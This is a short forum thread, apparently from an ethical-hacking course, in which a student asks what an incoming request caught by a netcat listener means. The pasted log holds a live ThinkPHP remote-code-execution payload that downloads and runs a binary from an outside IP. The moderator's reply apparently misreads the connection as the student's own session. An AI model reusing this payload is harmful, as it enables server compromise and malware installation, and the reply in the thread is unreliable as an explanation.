Viewing 4 posts - 1 through 4 (of 4 total)
  • #30026
    MJ
    Participant

    I ran the Bash command listener, being nc -vv etc., from my Kali VM and I got back this:

    connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
    GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: /
    User-Agent: Uirusu/2.0

    sent 0, rcvd 320

    I hadn’t started the bash on any other device at this stage, so I’m very curious to know what it means. Is someone connecting to me to infiltrate instead of the other way around?

    Please help, as this has got me a little worried.

    #30150
    Zaid Sabih
    Moderator

    Hello Mj,

    Which bash command are you referring to?

    #30221
    MJ
    Participant

    This is the listener for the bash, being nc -vv -l -p 8080, referenced in lecture 13.1.

    Thanks,

    #30286
    Zaid Sabih
    Moderator

    Ok so it seems like you got a connection back, did you try running any commands after that?
